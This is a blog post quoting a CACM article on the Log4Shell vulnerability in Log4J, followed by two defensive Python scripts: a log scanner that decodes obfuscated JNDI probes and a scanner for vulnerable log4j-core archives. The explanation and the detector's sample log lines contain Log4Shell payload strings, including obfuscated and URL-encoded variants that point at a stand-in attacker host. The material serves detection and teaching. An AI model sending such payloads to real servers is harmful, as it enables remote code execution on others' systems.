
Saturday, February 19, 2022

Log4j Security Challenge

Good overview and prediction of its influence

A Source of Security Challenges for Years to Come

By David Geer, Commissioned by CACM Staff, February 17, 2022

"Log4Shell is probably the most dangerous software vulnerability of its type on record," says Sandeep Lahane, CEO of cloud security firm Deepfence.

On November 24, 2021, Chen Zhaojun of the Alibaba Cloud Security Team discovered the critical software vulnerability Log4Shell in the open-source Java logging utility, Log4J. Log4J ships as components in Java archive (JAR) files that developers pull into their projects as a dependency, so they get logging without writing it themselves. The security community also knows Log4Shell by its Common Vulnerabilities and Exposures (CVE) ID, CVE-2021-44228. The Apache Software Foundation, which supports Log4J, rates Log4Shell as critical severity with a CVSS base score of 10.0, the highest possible.

Log4Shell is severe partly because the Log4J utility is commonplace, appearing in multitudes of software. "Java is undisputedly the most common language for enterprise software applications developed over the last 10-15 years. Logging is a core application requirement, and Log4J is the standard choice for logging," explains Lahane.

Log4Shell is as trivial for cybercriminals to abuse as it is ubiquitous. A look at how Log4Shell compares with other vulnerabilities puts it into perspective. "Log4Shell is easier to exploit than OpenSSL Heartbleed, and vulnerable components are significantly more widely distributed than Apache Struts—two other highly-dangerous vulnerabilities from the last decade," says Lahane.

To locate and leverage Log4Shell, attackers scan networks for hosts running vulnerable Log4J versions. Once they find one, they send a crafted string to the server through any input the application logs: an HTTP header such as User-Agent, a form field, a username, or a message carried over TCP or any other protocol the application accepts.

The crafted string contains a Log4J lookup, typically a JNDI lookup of the form ${jndi:ldap://attacker-host/object} that points at a server the attacker controls. When Log4J writes the string to a log, it resolves the lookup, connects to that server, and loads and executes the remote Java code it is handed back. The potential damage from Log4Shell attacks is severe; Remote Code Execution attacks like these let an attacker run arbitrary code on the server, including self-propagating malware such as worms that spread over the Internet.

"It's important to remember that threat actors can use the same open-source scanners to detect the vulnerability that security analysts use. Many remote scanners are currently available on open-source sites like GitHub," says Karen Walsh, CEO of content marketing firm Allegro Solutions.
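The scanning and detection just described cut both ways, and the same is true of the payload: defenders looking for Log4Shell probes in their own logs cannot simply grep for "jndi", because Log4J evaluates nested lookups such as ${lower:j} and ${::-j} before the JNDI lookup runs, and attackers use that to hide the string. The following is an added example, not code from the CACM article or from the Log4J project, of a detector that URL-decodes each log line, collapses nested lookups from the inside out the way Log4J does (only the lower, upper and default-value forms are modelled; that subset is an assumption), and then looks for a JNDI reference. The access-log lines are constructed for the example, and 198.51.100.7 is a documentation address, not a real attacker.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: one whose body contains no further "${" or "}".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Protocols the JNDI lookup will resolve once the string has been de-obfuscated.
JNDI_RE = re.compile(r"jndi:(?:ldaps?|rmi|dns|iiop|corba|nds|https?)://[^\s\"'}]+", re.IGNORECASE)

SAMPLE_LOG = [  # constructed access-log lines, not real traffic
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.5 - - [10/Dec/2021:12:00:05 +0000] "GET /status HTTP/1.1" 200 20 "-" "Monitor ${date:yyyy}"',
]


def _resolve(content: str) -> str:
    """Evaluate one innermost lookup the way an attacker expects Log4J 2.x to.

    Assumption: only the lookups that matter for de-obfuscation are modelled.
    Anything else is unwrapped to its literal body so the scan still sees it.
    """
    if content.startswith("lower:"):
        return content[len("lower:"):].lower()
    if content.startswith("upper:"):
        return content[len("upper:"):].upper()
    if ":-" in content:
        # ${env:NOPE:-j} and ${::-j} both evaluate to the default value "j".
        return content.split(":-", 1)[1]
    return content


def normalize_lookups(text: str, max_rounds: int = 32) -> str:
    """URL-decode, then collapse nested lookups from the inside out."""
    text = unquote(unquote(text))  # probes are often double-encoded
    for _ in range(max_rounds):  # bounded so a pathological line cannot spin forever
        new = INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def find_log4shell(line: str):
    """Return the decoded JNDI payload found in a log line, or None if it is clean."""
    m = JNDI_RE.search(normalize_lookups(line))
    return m.group(0) if m else None


def scan_lines(lines):
    """(line index, decoded payload) for every line carrying a JNDI lookup."""
    hits = []
    for i, raw in enumerate(lines):
        payload = find_log4shell(raw)
        if payload is not None:
            hits.append((i, payload))
    return hits


if __name__ == "__main__":
    for idx, payload in scan_lines(SAMPLE_LOG):
        print(f"line {idx}: {payload}")
```

Running this over the constructed lines flags the plain, nested-lookup and URL-encoded probes and leaves the benign ${date:yyyy} user agent alone; point scan_lines at the lines of a real access log to use it in anger. Note that detection in the logs only tells you a probe arrived, not whether the target was vulnerable; the callback to the attacker's LDAP or RMI server in outbound traffic is the signal that it was.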

Log4Shell is also difficult for organizations to mitigate. An enterprise may not know whether its software uses Log4J at all. If an application depends on a vulnerable Log4J component directly, that is a simple relationship, and the component is not so difficult to find. ....
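Finding the direct dependencies the article mentions, and the copies buried inside fat JARs, WARs and EARs where a manifest will not list them, is mostly a matter of opening archives and looking for the real Maven metadata that log4j-core carries. The following is an added example, not code from the CACM article, the blog, or the Log4J project, of a scanner that walks a directory tree, reads the log4j-core version from META-INF/maven/.../pom.properties, checks whether the JndiLookup class is present (removing it was a widely used mitigation), and recurses into nested archives. The version rule is a deliberate simplification and an assumption: any 2.x log4j-core below 2.15.0 other than the 2.3.1+ and 2.12.2+ back-ports is treated as affected; consult the Apache advisory for the authoritative list. The JARs it scans are constructed fixtures built in a temporary directory so the example runs offline; a shaded copy whose classes were relocated to another package will not be matched and is a known gap.

```python
import io
import os
import re
import tempfile
import zipfile

# Entries that identify log4j-core inside a JAR (the real paths Maven emits).
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
# Simplified rule (assumption; Apache's advisory is authoritative): 2.x below 2.15.0
# is affected, except the Java 6/7 back-port releases that fixed CVE-2021-44228.
PATCHED_BACKPORTS = {(2, 3, 1), (2, 3, 2), (2, 12, 2), (2, 12, 3), (2, 12, 4)}


def version_tuple(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 9), still below (2, 15, 0)."""
    parts = [int(p) for p in re.findall(r"\d+", version)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def is_affected(version):
    v = version_tuple(version)
    return v[0] == 2 and v < (2, 15, 0) and v not in PATCHED_BACKPORTS


def classify(version, has_jndi):
    if version is None:
        return "review" if has_jndi else None  # no metadata: a human must look
    if not is_affected(version):
        return "patched"
    return "vulnerable" if has_jndi else "mitigated"  # class deleted = mitigated


def inspect_archive(data, label):
    """Findings for one archive and for every archive nested inside it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return []
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        status = classify(version, JNDI_CLASS in names)
        findings = [] if status is None else [{"path": label, "version": version, "status": status}]
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXT):  # fat JAR, WAR, EAR: recurse
                findings += inspect_archive(zf.read(name), f"{label}!/{name}")
    return findings


def scan_tree(root):
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in sorted(filenames):
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    findings += inspect_archive(fh.read(), path)
    return findings


# --- constructed fixtures so the scanner can be exercised offline ---------------

def make_jar(version=None, include_jndi=False, nested=None):
    """Build a minimal in-memory JAR that mimics log4j-core's metadata layout."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version:
            zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
        for name, blob in (nested or {}).items():
            zf.writestr(name, blob)
    return buf.getvalue()


def run_demo():
    """Lay out a fake deployment in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "lib"))
        fixtures = {
            "lib/log4j-core-2.14.1.jar": make_jar("2.14.1", include_jndi=True),  # direct dep
            "app.jar": make_jar(nested={"BOOT-INF/lib/log4j-core-2.17.1.jar":
                                        make_jar("2.17.1", include_jndi=True)}),
            "legacy.war": make_jar(nested={"WEB-INF/lib/log4j-core-2.14.1.jar":
                                           make_jar("2.14.1", include_jndi=False)}),
        }
        for rel, blob in fixtures.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(blob)
        return scan_tree(root)


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['status']:<11}{(f['version'] or '?'):<9}{f['path']}")
```

The three fixtures cover the cases a practitioner meets in practice: a vulnerable direct dependency in lib/, an up-to-date copy nested inside a Spring Boot style fat JAR, and a vulnerable version inside a WAR whose JndiLookup class was stripped as a stopgap. Swap run_demo for scan_tree("/opt") or similar to run it against a real host; a "review" finding means log4j-core classes without Maven metadata, which usually indicates a shaded or repackaged copy that needs a manual look.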
